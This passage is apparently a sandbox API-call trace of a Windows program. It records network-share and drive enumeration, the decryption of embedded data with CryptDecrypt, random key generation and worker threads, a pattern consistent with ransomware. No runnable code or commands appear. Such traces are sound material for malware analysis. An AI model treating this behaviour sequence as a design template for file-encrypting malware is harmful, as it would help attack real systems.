hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4340048 | out: hHeap=0x2cb0000) returned 1 [0134.698] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4000) returned 0x2cb6040 [0134.698] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4340048 [0134.698] WNetOpenEnumW (in: dwScope=0x5, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x326fa6c | out: lphEnum=0x326fa6c*=0x1363ef0) returned 0x0 [0148.458] WNetEnumResourceW (in: hEnum=0x1363ef0, lpcCount=0x326fa64, lpBuffer=0x2cb6040, lpBufferSize=0x326fa70 | out: lpcCount=0x326fa64, lpBuffer=0x2cb6040, lpBufferSize=0x326fa70) returned 0x0 [0148.458] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4000) returned 0x4f20048 [0148.458] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4351668 [0148.459] WNetOpenEnumW (dwScope=0x5, dwType=0x0, dwUsage=0x0, lpNetResource=0x2cb6040, lphEnum=0x326fa2c) Thread: id = 75 os_tid = 0xf14 [0134.548] GetLogicalDrives () returned 0x4 [0134.548] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb14e0 [0134.549] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffc90 | out: phKey=0x40ffc90*=0x13271d8) returned 1 [0134.549] CryptSetKeyParam (hKey=0x13271d8, dwParam=0x1, pbData=0x40ffc78, dwFlags=0x0) returned 1 [0134.549] CryptDecrypt (in: hKey=0x13271d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb14e0, pdwDataLen=0x40ffc44 | out: pbData=0x2cb14e0, pdwDataLen=0x40ffc44) returned 1 [0134.549] CryptDestroyKey (hKey=0x13271d8) returned 1 [0134.549] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cb1528 [0134.549] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4c4 [0134.549] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4c8 [0134.549] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0134.549] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffbf4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffc5c | out: phKey=0x40ffc5c*=0x1327358) returned 1 [0134.549] CryptSetKeyParam (hKey=0x1327358, dwParam=0x1, pbData=0x40ffc44, dwFlags=0x0) returned 1 [0134.549] CryptDecrypt (in: hKey=0x1327358, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x40ffc10 | out: pbData=0x2cb13e8, pdwDataLen=0x40ffc10) returned 1 [0134.549] CryptDestroyKey (hKey=0x1327358) returned 1 [0134.549] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb4880 [0134.549] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb48a8 [0134.549] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4410 [0134.549] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffbcc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffc34 | out: phKey=0x40ffc34*=0x1326f58) returned 1 [0134.549] CryptSetKeyParam (hKey=0x1326f58, dwParam=0x1, pbData=0x40ffc1c, dwFlags=0x0) returned 1 [0134.549] CryptDecrypt (in: hKey=0x1326f58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4410, pdwDataLen=0x40ffbe8 | out: pbData=0x2cb4410, pdwDataLen=0x40ffbe8) returned 1 [0134.549] CryptDestroyKey (hKey=0x1326f58) returned 1 [0134.549] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0134.549] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb4880, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.549] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb48a8 | out: hHeap=0x2cb0000) returned 1 [0134.549] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0134.549] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x40ffc9c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x40ffc9c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.549] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4880 | out: hHeap=0x2cb0000) returned 1 [0134.549] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb12a0 [0134.549] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffba0 | out: phKey=0x40ffba0*=0x1327358) returned 1 [0134.550] CryptSetKeyParam (hKey=0x1327358, dwParam=0x1, pbData=0x40ffb88, dwFlags=0x0) returned 1 [0134.550] CryptDecrypt (in: hKey=0x1327358, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12a0, pdwDataLen=0x40ffb54 | out: pbData=0x2cb12a0, pdwDataLen=0x40ffb54) returned 1 [0134.550] CryptDestroyKey (hKey=0x1327358) returned 1 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb12d0 [0134.550] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffb98 | out: phKey=0x40ffb98*=0x13272d8) returned 1 [0134.550] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x40ffb80, dwFlags=0x0) returned 1 [0134.550] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12d0, pdwDataLen=0x40ffb4c | out: pbData=0x2cb12d0, pdwDataLen=0x40ffb4c) returned 1 [0134.550] CryptDestroyKey (hKey=0x13272d8) returned 1 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb13e8 [0134.550] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffb90 | out: phKey=0x40ffb90*=0x13271d8) returned 1 [0134.550] CryptSetKeyParam (hKey=0x13271d8, dwParam=0x1, pbData=0x40ffb78, dwFlags=0x0) returned 1 [0134.550] CryptDecrypt (in: hKey=0x13271d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x40ffb44 | out: pbData=0x2cb13e8, pdwDataLen=0x40ffb44) returned 1 [0134.550] CryptDestroyKey (hKey=0x13271d8) returned 1 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4880 [0134.550] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffb88 | out: phKey=0x40ffb88*=0x1327618) returned 1 [0134.550] CryptSetKeyParam (hKey=0x1327618, dwParam=0x1, pbData=0x40ffb70, dwFlags=0x0) returned 1 [0134.550] CryptDecrypt (in: hKey=0x1327618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4880, pdwDataLen=0x40ffb3c | out: pbData=0x2cb4880, pdwDataLen=0x40ffb3c) returned 1 [0134.550] CryptDestroyKey (hKey=0x1327618) returned 1 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb1400 [0134.550] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb18, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffb80 | out: phKey=0x40ffb80*=0x13271d8) returned 1 [0134.550] CryptSetKeyParam (hKey=0x13271d8, dwParam=0x1, pbData=0x40ffb68, dwFlags=0x0) returned 1 [0134.550] CryptDecrypt (in: hKey=0x13271d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1400, pdwDataLen=0x40ffb34 | out: pbData=0x2cb1400, pdwDataLen=0x40ffb34) returned 1 [0134.550] CryptDestroyKey (hKey=0x13271d8) returned 1 [0134.550] htonl (hostlong=0xb4197730) returned 0x307719b4 [0134.550] CryptGenRandom (in: hProv=0x12f68a8, dwLen=0x20, pbBuffer=0x40ffc48 | out: pbBuffer=0x40ffc48) returned 1 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x28) returned 0x2cb4410 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb4440 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4) returned 0x2cb1418 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x14) returned 0x2cb4458 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb4478 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x80) returned 0x2cb4490 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb4518 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x82) returned 0x2cb4db0 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb4530 [0134.550] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4) returned 0x2cb4548 [0134.550] CryptAcquireContextW (in: phProv=0x115fcf4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x115fcf4*=0x132bb00) returned 1 [0134.552] CryptGenRandom (in: hProv=0x132bb00, dwLen=0x55, pbBuffer=0x40ffbca | out: pbBuffer=0x40ffbca) returned 1 [0134.552] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb4558 [0134.552] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x80) returned 0x2cb04a0 [0134.553] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb4570 [0134.553] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x2) returned 0x2cb4588 [0134.553] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4) returned 0x2cb0528 [0134.553] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351190 [0134.553] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x80) returned 0x2cb4e40 [0134.553] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351088 [0134.553] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4) returned 0x2cb0538 [0134.553] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb4588, Size=0x82) returned 0x2cb4ec8 [0134.554] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb0538, Size=0x100) returned 0x4351668 [0134.554] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43510a0 [0134.554] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x82) returned 0x4351770 [0134.554] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351130 [0134.554] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x82) returned 0x4351800 [0134.554] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb4ec8, Size=0x104) returned 0x4351890 [0134.554] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x4351668, Size=0x200) returned 0x43519a0 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb0528 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43519a0 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351088 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4558 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4e40 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351190 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351890 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4570 | out: hHeap=0x2cb0000) returned 1 [0134.554] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351770 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43510a0 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351800 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351130 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1418 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4440 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4db0 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4518 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4490 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4478 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4548 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4530 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4458 | out: hHeap=0x2cb0000) returned 1 [0134.555] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0xa4) returned 0x2cb04a0 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12d0 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4880 | out: hHeap=0x2cb0000) returned 1 [0134.555] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1400 | out: hHeap=0x2cb0000) returned 1 [0134.555] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x14) returned 0x2cb12d0 [0134.555] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0xe) returned 0x4351208 [0134.555] ResetEvent (hEvent=0x4c8) returned 1 [0134.555] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1153bdf, lpParameter=0x2cb12d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4cc [0134.556] CloseHandle (hObject=0x4cc) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351220 [0134.556] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffba0 | out: phKey=0x40ffba0*=0x1327598) returned 1 [0134.556] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x40ffb88, dwFlags=0x0) returned 1 [0134.556] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4351220, pdwDataLen=0x40ffb54 | out: pbData=0x4351220, pdwDataLen=0x40ffb54) returned 1 [0134.556] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43510a0 [0134.556] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffb98 | out: phKey=0x40ffb98*=0x13272d8) returned 1 [0134.556] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x40ffb80, dwFlags=0x0) returned 1 [0134.556] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43510a0, pdwDataLen=0x40ffb4c | out: pbData=0x43510a0, pdwDataLen=0x40ffb4c) returned 1 [0134.556] CryptDestroyKey (hKey=0x13272d8) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43511f0 [0134.556] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffb90 | out: phKey=0x40ffb90*=0x1327498) returned 1 [0134.556] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x40ffb78, dwFlags=0x0) returned 1 [0134.556] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43511f0, pdwDataLen=0x40ffb44 | out: pbData=0x43511f0, pdwDataLen=0x40ffb44) returned 1 [0134.556] CryptDestroyKey (hKey=0x1327498) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4880 [0134.556] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffb88 | out: phKey=0x40ffb88*=0x1327598) returned 1 [0134.556] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x40ffb70, dwFlags=0x0) returned 1 [0134.556] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4880, pdwDataLen=0x40ffb3c | out: pbData=0x2cb4880, pdwDataLen=0x40ffb3c) returned 1 [0134.556] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43511c0 [0134.556] CryptImportKey (in: hProv=0x12f68a8, pbData=0x40ffb18, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x40ffb80 | out: phKey=0x40ffb80*=0x1327498) returned 1 [0134.556] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x40ffb68, dwFlags=0x0) returned 1 [0134.556] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43511c0, pdwDataLen=0x40ffb34 | out: pbData=0x43511c0, pdwDataLen=0x40ffb34) returned 1 [0134.556] CryptDestroyKey (hKey=0x1327498) returned 1 [0134.556] htonl (hostlong=0xb4197730) returned 0x307719b4 [0134.556] CryptGenRandom (in: hProv=0x12f68a8, dwLen=0x20, pbBuffer=0x40ffc48 | out: pbBuffer=0x40ffc48) returned 1 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x28) returned 0x2cb13e8 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351190 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4) returned 0x2cb1418 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x14) returned 0x2cb0550 [0134.556] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351088 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x80) returned 0x2cb4410 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43511d8 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x82) returned 0x2cb4498 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351238 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4) returned 0x2cb4f98 [0134.557] CryptGenRandom (in: hProv=0x132bb00, dwLen=0x55, pbBuffer=0x40ffbca | out: pbBuffer=0x40ffbca) returned 1 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43511a8 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x80) returned 0x4351668 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351250 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x2) returned 0x2cb4ef8 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4) returned 0x2cb4e58 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43510b8 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x80) returned 0x43516f0 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43510d0 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4) returned 0x2cb4e48 [0134.557] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb4ef8, Size=0x82) returned 0x4351778 [0134.557] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb4e48, Size=0x100) returned 0x4351808 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x43510e8 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x82) returned 0x4351910 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x4351100 [0134.557] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x82) returned 0x43519a0 [0134.557] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x4351778, Size=0x104) returned 0x4351a30 [0134.557] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x4351808, Size=0x200) returned 0x4351b40 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4e58 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351b40 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43510d0 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351668 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43511a8 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43516f0 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43510b8 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351a30 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351250 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351910 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43510e8 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43519a0 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351100 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1418 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351190 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4498 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43511d8 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351088 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4f98 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351238 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb0550 | out: hHeap=0x2cb0000) returned 1 [0134.558] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0xa4) returned 0x2cb4410 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43510a0 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43511f0 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4880 | out: hHeap=0x2cb0000) returned 1 [0134.558] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43511c0 | out: hHeap=0x2cb0000) returned 1 [0134.558] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x14) returned 0x2cb13e8 [0134.558] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0xe) returned 0x43511f0 [0134.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1153bdf, lpParameter=0x2cb13e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4cc [0134.559] CloseHandle (hObject=0x4cc) returned 1 [0134.559] WaitForSingleObject (hHandle=0x4c8, dwMilliseconds=0xffffffff) returned 0x0 [0135.371] CloseHandle (hObject=0x4c8) returned 1 [0135.371] CloseHandle (hObject=0x4c4) returned 1 [0135.371] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1528 | out: hHeap=0x2cb0000) returned 1 [0135.371] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb14e0 | out: hHeap=0x2cb0000) returned 1 Thread: id = 76 os_tid = 0xf18 [0134.571] GetLogicalDrives () returned 0x4 [0134.571] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb0550 [0134.571] CryptImportKey (in: hProv=0x12f68a8, pbData=0x423f944, 